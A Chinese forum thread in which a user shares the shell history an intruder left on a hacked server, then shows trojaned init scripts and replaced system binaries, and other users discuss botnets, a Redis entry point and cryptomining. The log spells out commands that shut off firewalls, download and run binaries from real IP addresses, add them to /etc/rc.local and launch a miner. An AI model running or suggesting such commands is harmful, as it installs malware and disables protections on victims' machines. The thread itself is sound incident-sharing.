~ # cat .ash_history
service iptables stop
wget http://211.147.119.195:1611/Linux2.6
chmod 0755 /root/Linux2.6
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 777 Linux2.6
./Linux2.6
chmod 0755 /root/Linux2.6
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 0777 Linux2.6
chmod u+x Linux2.6
./Linux2.6 &
chmod u+x Linux2.6
./Linux2.6 &
cd /tmp
service iptables stop
wget http://211.147.119.195:1611/Linux2.6
chmod 0755 /root/Linux2.6
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 777 Linux2.6
./164
chmod 0755 /root/Linux2.6
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 0777 Linux2.6
chmod u+x Linux2.6
./Linux2.6 &
chmod u+x dos6cc4
./Linux2.6 &
cd /tmp
echo "cd /root/">>/etc/rc.local
echo "./Linux2.6&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
/gisdfoewrsfdf
/bin/busybox cp; /gisdfoewrsfdf
/bin/busybox mount ;/gisdfoewrsfdf
/bin/busybox echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm -f /tmp/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon; /bin/busybox cat /var/tmp/.nippon; /bin/busybox rm -f /var/tmp/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/' > //.nippon; /bin/busybox cat //.nippon; /bin/busybox rm -f //.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm -f /proc/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm -f /dev/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm -f /dev/pts/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm -f /sys/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup' > /sys/fs/cgroup/.nippon; /bin/busybox cat /sys/fs/cgroup/.nippon; /bin/busybox rm -f /sys/fs/cgroup/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/systemd' > /sys/fs/cgroup/systemd/.nippon; /bin/busybox cat /sys/fs/cgroup/systemd/.nippon; /bin/busybox rm -f /sys/fs/cgroup/systemd/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuset' > /sys/fs/cgroup/cpuset/.nippon; /bin/busybox cat /sys/fs/cgroup/cpuset/.nippon; /bin/busybox rm -f /sys/fs/cgroup/cpuset/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/perf_event' > /sys/fs/cgroup/perf_event/.nippon; /bin/busybox cat /sys/fs/cgroup/perf_event/.nippon; /bin/busybox rm -f /sys/fs/cgroup/perf_event/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/net_cls' > /sys/fs/cgroup/net_cls/.nippon; /bin/busybox cat /sys/fs/cgroup/net_cls/.nippon; /bin/busybox rm -f /sys/fs/cgroup/net_cls/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuacct,cpu' > /sys/fs/cgroup/cpuacct,cpu/.nippon; /bin/busybox cat /sys/fs/cgroup/cpuacct,cpu/.nippon; /bin/busybox rm -f /sys/fs/cgroup/cpuacct,cpu/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/blkio' > /sys/fs/cgroup/blkio/.nippon; /bin/busybox cat /sys/fs/cgroup/blkio/.nippon; /bin/busybox rm -f /sys/fs/cgroup/blkio/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/memory' > /sys/fs/cgroup/memory/.nippon; /bin/busybox cat /sys/fs/cgroup/memory/.nippon; /bin/busybox rm -f /sys/fs/cgroup/memory/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/freezer' > /sys/fs/cgroup/freezer/.nippon; /bin/busybox cat /sys/fs/cgroup/freezer/.nippon; /bin/busybox rm -f /sys/fs/cgroup/freezer/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/devices' > /sys/fs/cgroup/devices/.nippon; /bin/busybox cat /sys/fs/cgroup/devices/.nippon; /bin/busybox rm -f /sys/fs/cgroup/devices/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/hugetlb' > /sys/fs/cgroup/hugetlb/.nippon; /bin/busybox cat /sys/fs/cgroup/hugetlb/.nippon; /bin/busybox rm -f /sys/fs/cgroup/hugetlb/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/dev/mqueue' > /dev/mqueue/.nippon; /bin/busybox cat /dev/mqueue/.nippon; /bin/busybox rm -f /dev/mqueue/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/etc/resolv.conf' > /etc/resolv.conf/.nippon; /bin/busybox cat /etc/resolv.conf/.nippon; /bin/busybox rm -f /etc/resolv.conf/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/etc/hostname' > /etc/hostname/.nippon; /bin/busybox cat /etc/hostname/.nippon; /bin/busybox rm -f /etc/hostname/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/etc/hosts' > /etc/hosts/.nippon; /bin/busybox cat /etc/hosts/.nippon; /bin/busybox rm -f /etc/hosts/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/dev/shm' > /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm -f /dev/shm/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/var/lib/mysql' > /var/lib/mysql/.nippon; /bin/busybox cat /var/lib/mysql/.nippon; /bin/busybox rm -f /var/lib/mysql/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/proc/bus' > /proc/bus/.nippon; /bin/busybox cat /proc/bus/.nippon; /bin/busybox rm -f /proc/bus/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/proc/fs' > /proc/fs/.nippon; /bin/busybox cat /proc/fs/.nippon; /bin/busybox rm -f /proc/fs/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/proc/irq' > /proc/irq/.nippon; /bin/busybox cat /proc/irq/.nippon; /bin/busybox rm -f /proc/irq/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/proc/sys' > /proc/sys/.nippon; /bin/busybox cat /proc/sys/.nippon; /bin/busybox rm -f /proc/sys/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/proc/sysrq-trigger' > /proc/sysrq-trigger/.nippon; /bin/busybox cat /proc/sysrq-trigger/.nippon; /bin/busybox rm -f /proc/sysrq-trigger/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/proc/kcore' > /proc/kcore/.nippon; /bin/busybox cat /proc/kcore/.nippon; /bin/busybox rm -f /proc/kcore/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/proc/timer_list' > /proc/timer_list/.nippon; /bin/busybox cat /proc/timer_list/.nippon; /bin/busybox rm -f /proc/timer_list/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/proc/timer_stats' > /proc/timer_stats/.nippon; /bin/busybox cat /proc/timer_stats/.nippon; /bin/busybox rm -f /proc/timer_stats/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/proc/sched_debug' > /proc/sched_debug/.nippon; /bin/busybox cat /proc/sched_debug/.nippon; /bin/busybox rm -f /proc/sched_debug/.nippon
/gisdfoewrsfdf
/bin/busybox cat /bin/echo ;/gisdfoewrsfdf
cd /tmp; /bin/busybox wget http://217.23.10.181/bins/usb_bus.x86 -O - > usb_bus ; /bin/busybox chmod 777 usb_bus ; ./usb_bus ;/gisdfoewrsfdf
service iptables stop
wget http://211.147.112.207:1611/Linux2.4
chmod 0755 /root/Linux2.4
nohup /root/Linux2.4 > /dev/null 2>&1 &
chmod 777 Linux2.4
./Linux2.4
chmod 0755 /root/Linux2.4
nohup /root/Linux2.4 > /dev/null 2>&1 &
chmod 0777 Linux2.4
chmod u+x Linux2.4
./Linux2.4 &
chmod u+x Linux2.4
./Linux2.4 &
cd /tmp
service iptables stop
wget http://211.147.112.207:1611/Linux2.6
chmod 0755 /root/Linux2.6
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 777 Linux2.6
service iptables stop
./164
wget http://211.147.112.207:1611/Linux2.4
chmod 0755 /root/Linux2.6
chmod 0755 /root/Linux2.4
nohup /root/Linux2.6 > /dev/null 2>&1 &
nohup /root/Linux2.4 > /dev/null 2>&1 &
chmod 0777 Linux2.6
chmod 777 Linux2.4
chmod u+x Linux2.6
./Linux2.4
./Linux2.6 &
chmod 0755 /root/Linux2.4
chmod u+x dos6cc4
nohup /root/Linux2.4 > /dev/null 2>&1 &
./Linux2.6 &
chmod 0777 Linux2.4
cd /tmp
chmod u+x Linux2.4
service iptables stop
./Linux2.4 &
wget http://211.147.112.207:1611/dd-wrt
chmod u+x Linux2.4
chmod 0755 /root/dd-wrt
./Linux2.4 &
nohup /root/dd-wrt > /dev/null 2>&1 &
cd /tmp
chmod 777 dd-wrt
service iptables stop
./dd-wrt
wget http://211.147.112.207:1611/Linux2.6
chmod 0755 /root/dd-wrt
chmod 0755 /root/Linux2.6
nohup /root/dd-wrt > /dev/null 2>&1 &
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 0777 dd-wrt
chmod 777 Linux2.6
chmod u+x dd-wrt
./164
./dd-wrt &
chmod 0755 /root/Linux2.6
chmod u+x dd-wrt
nohup /root/Linux2.6 > /dev/null 2>&1 &
./dd-wrt &
chmod 0777 Linux2.6
cd /tmp
chmod u+x Linux2.6
service iptables stop
./Linux2.6 &
wget http://211.147.112.207:1611/linux-arm
chmod u+x dos6cc4
chmod 0755 /root/linux-arm
./Linux2.6 &
nohup /root/linux-arm > /dev/null 2>&1 &
cd /tmp
chmod 777 linux-arm
service iptables stop
./linux-arm
wget http://211.147.112.207:1611/dd-wrt
chmod 0755 /root/linux-arm
nohup /root/linux-arm > /dev/null 2>&1 &
chmod 0777 linux-arm
chmod u+x linux-arm
chmod 0755 /root/dd-wrt
nohup /root/dd-wrt > /dev/null 2>&1 &
chmod 777 dd-wrt
./dd-wrt
./linux-arm &
chmod 0755 /root/dd-wrt
chmod u+x linux-arm
nohup /root/dd-wrt > /dev/null 2>&1 &
./linux-arm &
chmod 0777 dd-wrt
cd /tmp
chmod u+x dd-wrt
service iptables stop
./dd-wrt &
wget http://211.147.112.207:1611/linux-mips
chmod u+x dd-wrt
./dd-wrt &
chmod 0755 /root/linux-mips
nohup /root/linux-mips > /dev/null 2>&1 &
cd /tmp
chmod 777 linux-mips
service iptables stop
./linux-mips
wget http://211.147.112.207:1611/linux-arm
chmod 0755 /root/linux-mips
chmod 0755 /root/linux-arm
nohup /root/linux-mips > /dev/null 2>&1 &
nohup /root/linux-arm > /dev/null 2>&1 &
chmod 0777 linux-mips
chmod 777 linux-arm
chmod u+x linux-mips
./linux-arm
./linux-mips &
chmod 0755 /root/linux-arm
chmod u+x linux-mips
nohup /root/linux-arm > /dev/null 2>&1 &
./linux-mips &
chmod 0777 linux-arm
cd /tmp
chmod u+x linux-arm
service iptables stop
./linux-arm &
wget http://211.147.112.207:1611/taskhost.exe
chmod u+x linux-arm
chmod 0755 /root/taskhost.exe
./linux-arm &
nohup /root/taskhost.exe > /dev/null 2>&1 &
cd /tmp
chmod 777 taskhost.exe
service iptables stop
./taskhost.exe
wget http://211.147.112.207:1611/linux-mips
chmod 0755 /root/taskhost.exe
chmod 0755 /root/linux-mips
nohup /root/taskhost.exe > /dev/null 2>&1 &
nohup /root/linux-mips > /dev/null 2>&1 &
chmod 0777 taskhost.exe
chmod 777 linux-mips
chmod u+x taskhost.exe
./linux-mips
./taskhost.exe &
chmod 0755 /root/linux-mips
chmod u+x taskhost.exe
nohup /root/linux-mips > /dev/null 2>&1 &
./taskhost.exe &
chmod 0777 linux-mips
chmod u+x linux-mips
cd /tmp
./linux-mips &
echo "cd /root/">>/etc/rc.local
chmod u+x linux-mips
echo "./Linux2.4&">>/etc/rc.local
./linux-mips &
echo "./Linux2.6&">>/etc/rc.local
cd /tmp
echo "./dd-wrt&">>/etc/rc.local
service iptables stop
echo "./linux-arm&">>/etc/rc.local
wget http://211.147.112.207:1611/taskhost.exe
echo "./linux-mips&">>/etc/rc.local
chmod 0755 /root/taskhost.exe
echo "./taskhost&">>/etc/rc.local
nohup /root/taskhost.exe > /dev/null 2>&1 &
echo "/etc/init.d/iptables stop">>/etc/rc.local
chmod 777 taskhost.exe
./taskhost.exe
chmod 0755 /root/taskhost.exe
nohup /root/taskhost.exe > /dev/null 2>&1 &
chmod 0777 taskhost.exe
chmod u+x taskhost.exe
./taskhost.exe &
chmod u+x taskhost.exe
./taskhost.exe &
cd /tmp
echo "cd /root/">>/etc/rc.local
echo "./Linux2.4&">>/etc/rc.local
echo "./Linux2.6&">>/etc/rc.local
echo "./dd-wrt&">>/etc/rc.local
echo "./linux-arm&">>/etc/rc.local
echo "./linux-mips&">>/etc/rc.local
echo "./taskhost&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget http://115.236.92.99:12345/bins.sh
chmod 777 bins.sh
./bins.sh
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget http://115.236.92.99:12345/marlin
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
CD /tmp
wget http://115.236.92.99:8846/2500
chmod 777 2500
./2500 >/dev/null 2>&1 &
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
CD /tmp
wget http://115.236.92.99:12345/2500
chmod 777 2500
./2500 >/dev/null 2>&1 &
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget http://115.236.92.99:12345/marlin
chmod 777 marlin
./marlin -u 55489a27a09840cc82aec8c48858d30ec184344b162fb99e904f41e860a4dfad53db10d7b3f7.AK1 -I 20
1
suconghou OP /etc/init.d # ls
DbSecuritySpt QsystemsshMmt VsystemsshMdt mariadb rc.local selinux /etc/init.d # rm *t /etc/init.d # ls mariadb rc.local selinux /etc/init.d # cat selinux #!/bin/bash /usr/bin/bsd-port/getty /etc/init.d # ls -lh /usr/bin/bsd-port/getty -rwxr-xr-x 1 root root 1.2M Dec 17 15:49 /usr/bin/bsd-port/getty /etc/init.d # md5sum /usr/bin/bsd-port/getty 2dafa3cb07d8e13ae9bf9136ed97403c /usr/bin/bsd-port/getty /etc/init.d # md5sum /bin/ps 2dafa3cb07d8e13ae9bf9136ed97403c /bin/ps /etc/init.d # md5sum /bin/netstat 2dafa3cb07d8e13ae9bf9136ed97403c /bin/netstat /etc/init.d # md5sum /usr/bin/lsof 2dafa3cb07d8e13ae9bf9136ed97403c /usr/bin/lsof /etc/init.d # 都是这个 2dafa |
2
swulling 2016-12-29 17:12:24 +08:00
这个不叫『黑客』,这个叫『脚本小子』
|
3
ryd994 2016-12-29 17:12:50 +08:00 via Android
一般不建议用 docker 做蜜罐,因为如果对方看出来的话,想打穿还是有可能的
|
4
suconghou OP 无意间成了蜜罐 已停用 ssh
|
5
megatron 2016-12-29 17:52:53 +08:00
这是照着教材来的?
说个好玩儿的,前两天一个测试机被入侵了,入侵者竟然帮我升级了 jdk ,我想了半天也不知道为什么。 |
6
xss 2016-12-29 18:18:04 +08:00
这个是自动化脚本干的, 并不是人进行的操作.
应该是僵尸网络中的节点在找更多的节点, 加入僵尸网络. |
7
suconghou OP 查了一下 可能是透过 redis 入侵的, cron 文件都被改了,redis 我开着外网端口来着.
|
8
tanszhe 2016-12-29 19:02:45 +08:00
干什么了什么啊?求大神解释一下这段代码干了什么?
|
9
dant 2016-12-29 23:51:20 +08:00
挖矿吧
|
10
maxwel1 2017-01-11 13:49:13 +08:00
测试用的 centos ,还在调试,然后过了个周末发现被执行了上面那个脚本,如果不重装的话,怎么清理干净呢?有什么办法吗?
|